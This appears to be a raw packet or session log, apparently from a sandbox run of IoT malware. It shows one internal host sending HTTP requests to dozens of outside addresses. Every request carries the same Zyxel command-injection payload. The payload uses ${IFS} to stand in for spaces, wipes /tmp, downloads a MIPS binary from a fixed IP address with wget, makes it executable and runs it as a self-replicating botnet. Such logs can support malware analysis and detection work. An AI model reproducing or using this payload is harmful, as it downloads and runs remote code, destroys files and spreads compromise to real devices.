                        Mar 12, 2024 08:50:41.224805117 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3105192.168.2.1448912128.207.120.135443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224864960 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3106192.168.2.1454142132.15.110.127443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224877119 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3107192.168.2.1434214167.62.181.67443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224931002 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3108192.168.2.1435542208.148.93.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224965096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3109192.168.2.145192270.243.233.14443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225011110 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3110192.168.2.1458186162.29.98.98443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225054979 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3111192.168.2.1456366167.107.161.218443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225092888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3112192.168.2.143713882.20.97.238443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225138903 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3113192.168.2.1460392104.134.57.53443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225163937 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3114192.168.2.1434964121.21.193.112443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225189924 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3115192.168.2.145835247.35.56.164443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225223064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3116192.168.2.1442448139.182.81.242443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225258112 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3117192.168.2.1441670130.91.30.77443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225298882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3118192.168.2.1435722210.101.180.4443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225334883 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3119192.168.2.1436878108.189.132.108443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225362062 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3120192.168.2.143391239.159.119.219443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225373983 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3121192.168.2.145449072.237.59.88443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225399017 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3122192.168.2.1440556143.45.136.11443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225452900 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3123192.168.2.1450662202.247.159.20443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225478888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3124192.168.2.1454904119.176.20.216443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225497961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3125192.168.2.144050825.106.65.104443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225553036 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3126192.168.2.1459662206.84.0.87443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225581884 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3127192.168.2.1460874181.232.169.231443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225639105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3128192.168.2.144856273.180.9.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225657940 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3129192.168.2.14422085.51.49.117443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225689888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3130192.168.2.143311058.156.147.92443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225714922 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3131192.168.2.1433628172.250.178.83443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225752115 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3132192.168.2.1444182158.205.57.48443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225797892 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3133192.168.2.145314091.240.60.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225805044 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3134192.168.2.143631696.169.190.240443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225852013 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3135192.168.2.144657263.127.192.156443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225903988 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3136192.168.2.1453180146.132.60.121443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225929022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3137192.168.2.1457574100.222.128.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.225970984 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3138192.168.2.143328497.190.106.102443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226028919 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3139192.168.2.1448668166.223.113.24443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226044893 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3140192.168.2.143948298.6.223.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226080894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3141192.168.2.1451662148.189.7.148443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226119041 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3142192.168.2.1446938204.55.65.148443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226161957 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3143192.168.2.1441302114.78.160.114443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226217985 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3144192.168.2.144577035.65.140.252443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226265907 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3145192.168.2.1454740125.123.157.193443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226298094 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3146192.168.2.144836844.192.75.47443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226324081 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3147192.168.2.1456270112.237.172.111443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226386070 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3148192.168.2.1438726123.142.219.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226401091 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3149192.168.2.143678287.42.66.115443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226468086 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3150192.168.2.144479023.201.44.152443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226521015 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3151192.168.2.143672654.226.150.228443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226548910 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3152192.168.2.144676875.27.39.130443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226576090 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3153192.168.2.145094275.79.75.145443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226608038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3154192.168.2.1460530196.86.22.167443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226638079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3155192.168.2.1453088171.254.247.18443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226684093 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3156192.168.2.143398463.186.102.119443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226705074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3157192.168.2.1459804221.47.128.137443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226768970 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3158192.168.2.1453146129.58.173.14443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226800919 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3159192.168.2.144792292.138.117.88443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226839066 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3160192.168.2.145882271.215.213.227443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226866961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3161192.168.2.14603008.148.163.0443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226886034 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3162192.168.2.14493329.115.61.177443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226917028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3163192.168.2.1456478100.234.189.4443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226968050 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3164192.168.2.145180037.112.29.202443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.226984978 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3165192.168.2.146076893.105.243.40443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227018118 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3166192.168.2.143395220.70.79.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227083921 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3167192.168.2.144059498.218.145.76443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227119923 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3168192.168.2.143911878.83.4.174443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227159023 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3169192.168.2.1456268108.33.60.8443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227195978 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3170192.168.2.1459606223.179.112.128443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227215052 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3171192.168.2.1433366216.213.159.153443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227247953 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3172192.168.2.1440938133.137.62.142443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227287054 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3173192.168.2.1443352125.158.90.39443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227318048 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
